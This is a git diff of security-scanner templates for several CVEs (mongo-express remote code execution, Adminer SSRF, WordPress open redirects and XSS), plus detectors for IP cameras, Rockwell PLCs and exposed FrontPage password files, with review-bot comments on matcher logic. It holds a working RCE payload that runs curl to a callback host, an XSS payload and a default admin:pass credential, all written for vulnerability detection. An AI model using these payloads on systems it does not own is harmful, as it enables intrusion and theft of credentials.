@@ -4,20 +4,32 @@ info: name: mongo-express Remote Code Execution author: princechaddha severity: critical - description: "mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment." + description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Upgrade mongo-express to version 0.54.0 or higher. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - remediation: Upgrade mongo-express to version 0.54.0 or higher. - metadata: - shodan-query: http.title:"Mongo Express" + - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 + - https://github.com/CLincat/vulcat + - https://github.com/MelanyRoob/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.90 + cvss-score: 9.9 cve-id: CVE-2019-10758 - tags: cve,cve2019,mongo,mongo-express + epss-score: 0.97429 + epss-percentile: 0.99934 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* + metadata: + max-request: 1 + vendor: mongo-express_project + product: mongo-express + framework: node.js + shodan-query: http.title:"Mongo Express" + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js -requests: +http: - raw: - | POST /checkValid HTTP/1.1 
@@ -25,11 +37,11 @@ requests: Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") + matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/03/29 +# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-36365.yaml b/poc/cve/cve-2020-36365.yaml index 771c887368..c3116b81e6 100644 --- a/poc/cve/cve-2020-36365.yaml +++ b/poc/cve/cve-2020-36365.yaml 
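Review bot: The raw request in this hunk carries `Authorization: Basic YWRtaW46cGFzcw==` (`admin:pass`, the credential pair mongo-express ships as its default), so the template only fires against instances still using that default login; a non-match says nothing about whether a mongo-express behind real credentials is patched. That precondition belongs in the template, e.g. `# assumes default basic-auth credentials; a negative result does not imply the host is patched` above the header, and it matches the `PR:L` in the CVSS vector in the first hunk. The enclosing raw request starts before this hunk, so the comment would sit next to the header line rather than on the request's first line.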
@@ -1,31 +1,43 @@ id: CVE-2020-36365 info: - name: Smartstore < 4.1.0 - Open redirect + name: Smartstore <4.1.0 - Open Redirect author: 0x_Akoko severity: medium - description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. + description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - - https://www.cvedetails.com/cve/CVE-2020-36365 - https://github.com/smartstore/SmartStoreNET + - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-36365 cwe-id: CWE-601 + epss-score: 0.00244 + epss-percentile: 0.62379 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: smartstore + product: smartstorenet shodan-query: http.html:'content="Smartstore' - tags: cve,cve2020,redirect,smartstore + tags: cve2020,cve,redirect,smartstore -requests: +http: - method: GET - path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' matchers: - type: regex part: header regex: - - 
'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-21311.yaml b/poc/cve/cve-2021-21311.yaml index fc48ecd2fb..deec236dce 100644 --- a/poc/cve/cve-2021-21311.yaml +++ b/poc/cve/cve-2021-21311.yaml 
@@ -1,34 +1,69 @@ id: CVE-2021-21311 info: - name: Adminer SSRF Using Verbose Error Messages - author: Adam Crosser + name: Adminer <4.7.9 - Server-Side Request Forgery + author: Adam Crosser,pwnhxl severity: high - description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9. + description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. + remediation: Upgrade to version 4.7.9 or later. 
reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - metadata: - shodan-query: title:"Login - Adminer" - tags: cve,cve2021,adminer,ssrf + - https://packagist.org/packages/vrana/adminer + - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 + - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.20 + cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 + epss-score: 0.01485 + epss-percentile: 0.85417 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* + metadata: + max-request: 6 + vendor: adminer + product: adminer + shodan-query: title:"Login - Adminer" + fofa-query: app="Adminer" && body="4.7.8" + hunter-query: app.name="Adminer"&&web.body="4.7.8" + tags: cve2021,cve,adminer,ssrf -requests: - - method: GET - path: - - "{{BaseURL}}/adminer?elastic=example.com&username=" +http: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} + + payloads: + path: + - "/index.php" + - "/adminer.php" + - "/adminer/adminer.php" + - "/adminer/index.php" + - "/_adminer.php" + - "/_adminer/index.php" + + attack: batteringram + stop-at-first-match: true + redirects: true + max-redirects: 1 matchers-condition: and matchers: - - type: status - status: - - 403 - - type: word part: body words: + - "400 - Bad Request" - "<title>400 - Bad Request</title>" + condition: or + + - type: status + status: + - 403 +# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
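Review bot: In the new word matcher, `"<title>400 - Bad Request</title>"` can only match when `"400 - Bad Request"` also matches, so with `condition: or` the second entry is dead; keep one of them, or drop `condition: or` and require the title form if the intent was a stricter signature. `auth[server]=example.org` also makes every scanned Adminer open an outbound connection to a third-party host as a side effect of the test; if the elastic driver does issue an HTTP request to that host (the referenced PDF should say), an `{{interactsh-url}}` value would avoid that and give a positive out-of-band confirmation instead of relying on the `403` plus error-page heuristic. `metadata.max-request: 6` matches the six `path` payloads under `batteringram`, but `stop-at-first-match: true` means the real count is usually lower; a short comment would keep the number from being read as a fixed budget.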
diff --git a/poc/cve/cve-2021-25111.yaml b/poc/cve/cve-2021-25111.yaml index 42b2530141..01f582930c 100644 --- a/poc/cve/cve-2021-25111.yaml +++ b/poc/cve/cve-2021-25111.yaml @@ -5,17 +5,30 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. + remediation: | + Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - https://nvd.nist.gov/vuln/detail/CVE-2021-25111 - tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-25111 cwe-id: CWE-601 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: english_wordpress_admin_project + product: english_wordpress_admin + framework: wordpress + tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project -requests: +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" 
@@ -24,6 +37,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by md on 2022/10/14 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-0149.yaml b/poc/cve/cve-2022-0149.yaml index ef415ad101..136a815fff 100644 --- a/poc/cve/cve-2022-0149.yaml +++ b/poc/cve/cve-2022-0149.yaml 
@@ -1,21 +1,36 @@ id: CVE-2022-0149 info: - name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting + name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c - https://nvd.nist.gov/vuln/detail/CVE-2022-0149 + - https://plugins.trac.wordpress.org/changeset/2654545/woocommerce-exporter + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2022-0149 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: visser + product: store_exporter_for_woocommerce + framework: wordpress + tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -29,7 +44,6 @@ requests: GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
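Review bot: The second hunk removes `cookie-reuse: true` from the two-step raw sequence (login via `wp-login.php`, then the authenticated `admin.php?page=woo_ce` request) without anything replacing it; that is only behaviour-preserving on a nuclei engine that carries cookies across raw requests by default. On an engine that does not, the second request goes out unauthenticated and the template silently stops detecting the issue, so either keep the key or state the minimum engine version the repository targets (a `# requires nuclei with default cookie reuse across raw requests` comment at the top of the `http` block would do). Separately, the first hunk renames the finding from `Reflected Cross-Site Scripting` to `Cross-Site Scripting` while `description` still says reflected; the more specific wording in `name` was the better one.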
@@ -45,5 +59,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/28 +# digest: 4a0a0047304502202e7a4ad224a01fb7e302b35a466effdce8c1ab91a0159ee0a5aa7e2f156ff75502210090a13e099a971610a1ffc1c1d6173e1e325a337b5ce510b4e8945c909b24b5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-27849.yaml b/poc/cve/cve-2022-27849.yaml index d52f9a2027..8aa1ca42b3 100644 --- a/poc/cve/cve-2022-27849.yaml +++ b/poc/cve/cve-2022-27849.yaml 
@@ -6,20 +6,33 @@ info: severity: high description: | WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages. + remediation: | + Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability. reference: - https://wordpress.org/plugins/simple-ajax-chat/#developers - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-27849 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-27849 cwe-id: CWE-200 + epss-score: 0.00713 + epss-percentile: 0.80067 + cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 + vendor: plugin-planet + product: simple_ajax_chat + framework: wordpress google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure + tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' @@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 +# digest: 490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
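Review bot: The added `impact:` asserts that the export exposes "user credentials or private messages", which nothing in the description supports — the description only says the exported data in sac-export.csv is reachable without authentication. Impact text should stay within what the template actually demonstrates, e.g. `An unauthenticated user can download sac-export.csv and read the exported chat data it contains.`. The `http:` migration and the added `metadata:` fields look consistent with the other templates in this commit.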
diff --git a/poc/detect/hipcam-detect.yaml b/poc/detect/hipcam-detect.yaml
new file mode 100644
index 0000000000..8cb51d1337
--- /dev/null
+++ b/poc/detect/hipcam-detect.yaml
@@ -0,0 +1,50 @@
+id: hipcam-ip-camera-detection
+
+info:
+ name: Hipcam IP Camera Detection
+ author: Redflare Cyber
+ severity: medium
+ description: This template checks for Hipcam IP cameras and identifies them via the RTSP service on TCP port 554.
+ classification:
+ cwe-id: CWE-284
+ metadata:
+ max-request: 1
+ shodan-query: 'port:554 "Server: Hipcam RealServer/V1.0"'
+ tags: hipcam,ipcamera,tcp,rtsp,IoT
+
+requests:
+ - raw:
+ - |
+ OPTIONS rtsp://{{Hostname}}:{{Port}}/ RTSP/1.0
+ CSeq: 1
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "RTSP/1.0 200 OK"
+ - "Server: Hipcam RealServer/V1.0"
+
+ - type: regex
+ regex:
+ - "Public:.*OPTIONS,.*DESCRIBE,.*SETUP,.*TEARDOWN,.*PLAY,.*SET_PARAMETER,.*GET_PARAMETER"
+
+tcp:
+ - inputs:
+ - data: "\r\n"
+ host:
+ - "{{Hostname}}"
+ port: 554
+
+ matchers:
+ - type: word
+ words:
+ - "RTSP/1.0 200 OK"
+ - "Server: Hipcam RealServer/V1.0"
+ - "OPTIONS,DESCRIBE,SETUP,TEARDOWN,PLAY,SET_PARAMETER,GET_PARAMETER"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "CSeq: ([0-9]+)"
diff --git a/poc/detect/rockwell-plc-detect.yaml b/poc/detect/rockwell-plc-detect.yaml
new file mode 100644
index 0000000000..88b3460a25
--- /dev/null
+++ b/poc/detect/rockwell-plc-detect.yaml
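Review bot: The `requests:` block pushes an RTSP request line through the HTTP engine, which is unlikely to yield a valid RTSP exchange, while the `tcp:` block that actually talks to port 554 sends only `"\r\n"`, so its `Server: Hipcam RealServer/V1.0` and `OPTIONS,DESCRIBE,...` word matchers and the `CSeq: ([0-9]+)` extractor have nothing to match (no CSeq is ever sent). Consider dropping the `requests:` section and moving the OPTIONS request into the tcp input, `- data: "OPTIONS rtsp://{{Hostname}}:554/ RTSP/1.0\r\nCSeq: 1\r\n\r\n"`, which also makes `max-request: 1` accurate again — as written the template issues two probes. `requests:` is additionally the legacy key that the other files in this commit migrate to `http:`.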
@@ -0,0 +1,234 @@ +id: rockwell-automation-plc-detection + +info: + name: Rockwell Automation/Allen-Bradley PlC Detection with Version Matching + author: Redflare Cyber + severity: low + description: | + This template detects Rockwell Automation/Allen-Bradley devices by checking for specific strings in the response on TCP port 44818, including Vendor ID, Product Name, Device Type, Serial Number, and known version identifiers. + metadata: + max-request: 1 + shodan-query: 'port:44818 product:"Rockwell Automation/Allen-Bradley"' + tags: rockwell-allen-bradley,scada,IIoT,network,tcp + +tcp: + - inputs: + - data: "63000000000000000000000000000000c1debed100000000" + type: hex + + host: + - "{{Hostname}}" + port: 44818 + read-size: 1024 + matchers: + - type: word + words: + - "Vendor ID: Rockwell Automation/Allen-Bradley" + - "Product name:" + - "Device type:" + - "Serial number:" + part: body + condition: and + + - type: regex + regex: + - "1769-L19ER-BB1B/A LOGIX5319ER" + - "1766-L32BXBA C/21.02" + - "2080-LC20-20QWB" + - "1769-L33ER/A LOGIX5333ER" + - "1766-L32AWA C/21.02" + - "1769-L24ER-QBFC1B/A LOGIX5324ER" + - "1769-L32E Ethernet Port" + - "1766-L32BWA C/21.02" + - "1756-L61/B LOGIX5561" + - "1766-L32BXB C/21.02" + - "1766-L32BXBA C/21.07" + - "1766-L32AWA C/21.07" + - "1769-L18ER/B LOGIX5318ER" + - "2080-LC50-24QWB" + - "1769-L30ER/A LOGIX5330ER" + - "1756-ENBT/A" + - "1766-L32AWAA C/21.02" + - "1769-L16ER/B LOGIX5316ER" + - "1769-L24ER-QB1B/A LOGIX5324ER" + - "1766-L32BWAA C/21.02" + - "1766-L32BXBA B/15.00" + - "1763-L16DWD B/16.00" + - "1766-L32AWA C/21.06" + - "1769-L27ERM-QxC1B/A LOGIX5327ERM" + - "1756-EN2T/D" + - "1769-L35E Ethernet Port" + - "1766-L32BXB B/15.00" + - "1766-L32AWA B/15.00" + - "1763-L16DWD B/14.00" + - "1766-L32BXB B/13.00" + - "2080-LC50-24QBB" + - "1766-L32BWA B/15.00" + - "1766-L32BWAA C/21.07" + - "1763-L16BWA B/14.00" + - "1763-L16BWA B/16.00" + - "1763-L16BWA B/9.00" + - "1766-L32AWAA C/21.07" + - "1766-L32BWAA B/15.00" + - 
"1763-L16AWA B/16.00" + - "1763-L16BBB B/14.00" + - "1763-L16BBB B/16.00" + - "1766-L32BXBA C/21.06" + - "2080-LC50-48QWB" + - "1766-L32BXBA B/14.00" + - "1766-L32AWAA B/15.00" + - "1766-L32BWAA B/15.04" + - "1766-L32AWA B/16.00" + - "1769-L19ER-BB1B/C LOGIX5319ER" + - "1763-L16BWA B/11.00" + - "1766-L32BWAA B/16.00" + - "5069-L306ER/A" + - "1766-L32BWA B/16.00" + - "1763-L16AWA B/14.00" + - "1766-L32BWAA B/14.00" + - "1766-L32BXBA B/16.00" + - "1763-L16BBB B/11.00" + - "1766-L32BXB B/10.00" + - "1769-L18ER/A LOGIX5318ER" + - "1769-L36ERM/A LOGIX5336ERM" + - "2080-LC20-20AWB" + - "1766-L32BXB B/11.00" + - "1766-L32BXBA B/11.00" + - "1766-L32BWAA C/21.06" + - "1763-L16BWA B/12.00" + - "1766-L32AWAA C/21.06" + - "1766-L32BWAA B/13.00" + - "2080-LC20-20QBB" + - "1763-L16AWA B/12.00" + - "1766-L32BXB A/5.00" + - "1766-L32BXB C/21.07" + - "1766-L32BXBA B/13.00" + - "1761-NET-ENI/D" + - "1763-L16AWA B/9.00" + - "2080-LC50-24AWB" + - "1766-L32BWA C/21.07" + - "5069-L320ER/A" + - "1766-L32AWA B/11.00" + - "1769-L33ERM/A LOGIX5333ERM" + - "1763-L16DWD B/12.00" + - "1766-L32AWAA B/11.00" + - "1766-L32BXB B/14.00" + - "1756-EN2T/C" + - "1763-L16AWA A/3.00" + - "1763-L16BBB B/12.00" + - "1766-L32AWAA B/14.00" + - "1766-L32BWA B/10.00" + - "1766-L32BWA B/11.00" + - "1766-L32BWA C/21.06" + - "1766-L32BXBA B/10.00" + - "1769-L30ERMS/A LOGIX5370SAFETY" + - "2080-LC50-48AWB" + - "1747-L551/C C/11 - DC 3.46" + - "1756-EN2TR/C 217021900" + - "1763-L16BBB B/9.00" + - "1763-L16DWD B/9.00" + - "1766-L32BWA B/14.00" + - "1768-ENBT/A" + - "2080-LC70-24QWB" + - "1747-L553 C/6 - DC 2.50" + - "1756-EWEB/A" + - "1763-L16BWA B/15.02" + - "1766-L32AWAA B/13.00" + - "1766-L32BXB B/16.00" + - "1766-L32BXBA A/5.00" + - "1766-L32BXBA B/21.07" + - "1769-L16ER/A LOGIX5316ER" + - "1769-L24ER-QB1B/B LOGIX5324ER" + - "2080-L50E-24QBB" + - "2080-LC50-48QBB" + - "1747-L551/C C/10 - DC 3.46" + - "1747-L552/C C/11 - DC 3.46" + - "1763-L16AWA B/11.00" + - "1747-L551/C C/13 - DC 3.54" + - "1756-L81E/B" + - 
"1766-L32AWA B/10.00" + - "1766-L32AWAA B/16.00" + - "1766-L32BWA B/13.00" + - "1766-L32BWAA B/10.00" + - "1769-L36ERMS/A LOGIX5370SAFETY" + - "2080-L50E-24QWB" + - "1747-L553/C C/11 - DC 3.46" + - "1766-L32AWA B/14.00" + - "1766-L32AWAA A/5.00" + - "1766-L32BWAA B/11.00" + - "1766-L32BWAA B/21.03" + - "1769-L30ERMS/B LOGIX5370SAFETY" + - "5069-L310ER/A" + - "5069-L330ER/A" + - "PanelView Plus_6 1000" + - "1408-EM3A-ENT, Series B" + - "1747-L552/C C/13 - DC 3.54" + - "1756-EN3TR/B" + - "1766-L32AWA B/13.00" + - "1766-L32BWA A/5.00" + - "1766-L32BXB C/21.06" + - "1769-L16ER-BB1B/C LOGIX5316ER" + - "1769-L24ER-QBFC1B/B LOGIX5324ER" + - "1769-L27ERM-QxC1B/B LOGIX5327ERM" + - "1769-L37ERM/A LOGIX5337ERM" + - "1747-L552/C C/10 - DC 3.46" + - "1763-L16BWA A/3.00" + - "1766-L32AWA A/4.00" + - "1766-L32AWA A/5.00" + - "1766-L32AWA B/21.06" + - "1766-L32AWA B/21.07" + - "1766-L32AWAA B/21.03" + - "1766-L32BWA A/7.00" + - "1766-L32BXBA B/21.02" + - "1769-L18ERM/B LOGIX5318ERM" + - "1769-L23E-QBFC1 Ethernet Port" + - "2080-L50E-48QWB" + - "2711R-T10T/A" + - "2711R-T4T/B" + - "5069-L306ERM/A" + - "5069-L310ERMS2/B" + - "5069-L330ERMS3/A" + - "BGT Cellular Module" + - "EIP Adapter1" + - "Emulate 5380 Controller" + - "Emulate 5580 Controller" + - "EtherNetIP Master Stack Library" + - "PanelView Plus 7 Perf 1000" + - "PanelView Plus_7 Standard 1000" + - "1734-AENT/B Ethernet Adapter" + - "1747-L551 C/6 - DC 2.50" + - "1747-L552 C/8 - DC 2.59" + - "1747-L553/C C/13 - DC 3.54" + - "1756-EN2TR/C" + - "1763-L16AWA B/00.00" + - "1763-L16DWD B/11.00" + - "1763-L16DWD B/15.02" + - "1766-L32AWA A/3.00" + - "1766-L32AWA B/21.05" + - "1766-L32AWA C/21.05" + - "1766-L32AWAA B/10.00" + - "1766-L32AWAA C/21.03" + - "1766-L32BWA A/3.00" + - "1766-L32BWA A/4.00" + - "1766-L32BWAA A/3.00" + - "1766-L32BWAA B/21.07" + - "1766-L32BWAA C/21.04" + - "1766-L32BXB A/7.00" + - "1766-L32BXBA B/15.05" + - "1766-L32BXBA B/21.00" + - "1766-L32BXBA B/21.04" + - "1769-L23E-QB1 Ethernet Port" + - 
"1769-L36ERMS/B LOGIX5370SAFETY"
+ - "2080-L50E-24AWB"
+ - "2080-LC50-24QVB"
+ - "2080-LC70-24QBB"
+ - "5069-L306ERS2/B"
+ - "5069-L320ERM/A"
+ - "5069-L320ERMS2/B"
+ - "PLC-5/40E E/H - DC 2.53"
+ - "PLC-5/40E E/K - DC 2.64"
+ - "PanelView Plus 7 Perf 700"
+ - "PanelView Plus_7 Standard 1200W"
+ - "PanelView Plus_7 Standard 600"
+ - "PowerMonitor 5000"
+ part: body
diff --git a/poc/detect/wowza-streaming-detect.yaml b/poc/detect/wowza-streaming-detect.yaml
index 474f52504a..20093618e0 100644
--- a/poc/detect/wowza-streaming-detect.yaml
+++ b/poc/detect/wowza-streaming-detect.yaml
@@ -1,15 +1,17 @@
id: wowza-streaming-engine
+
info:
name: Wowza Streaming Engine
author: dhiyaneshDK
severity: info
- metadata:
- shodan-query: http.title:"Manager" product:"Wowza Streaming Engine"
+ reference: https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22
tags: panel
+
requests:
- method: GET
path:
- '{{BaseURL}}/enginemanager/ftu/welcome.htm'
+
matchers-condition: and
matchers:
- type: word
diff --git a/poc/exposed/frontpage-exposure.yaml b/poc/exposed/frontpage-exposure.yaml
new file mode 100644
index 0000000000..6d3255435b
--- /dev/null
+++ b/poc/exposed/frontpage-exposure.yaml
@@ -0,0 +1,34 @@
+id: frontpage-pwd-file
+
+info:
+ name: Frontpage service-vti Configuration File - Detect
+ author: Redflare Cyber
+ severity: high
+ description: Frontpage config file was detected.
+ metadata:
+ max-request: 1
+ tags: config,exposure,frontpage
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_vti_pvt/service.pwd"
+ - "{{BaseURL}}_vti_pvt/administrators.pwd"
+ - "{{BaseURL}}_vti_pvt/authors.pwd"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "admin"
+ - "webmaster"
+ - "administrator"
+ condition: and
+
+ - type: word
+ words:
+ - "text/plain"
+ part: header
+
+ - type: status
+ status:
+ - 200
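Review bot: The first matcher of the rockwell-plc-detect hunk requires the literal labels `Vendor ID: Rockwell Automation/Allen-Bradley`, `Product name:`, `Device type:` and `Serial number:` in the TCP reply, but those are the labels a banner-rendering service prints; the ListIdentity reply that the hex input elicits carries the vendor as a 16-bit field and only the product name as text, so with `condition: and` this matcher is unlikely ever to fire on a live device. Because no `matchers-condition` is set the template still reports whenever any entry of the long `regex:` list appears, so the vendor check adds nothing; either drop it or set `matchers-condition: and` with a word match on product-name strings only. The list entries are literals containing unescaped `.` (`C/21.02`), so `- type: word` is the better matcher type, and the `name:` still reads "PlC" instead of "PLC".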
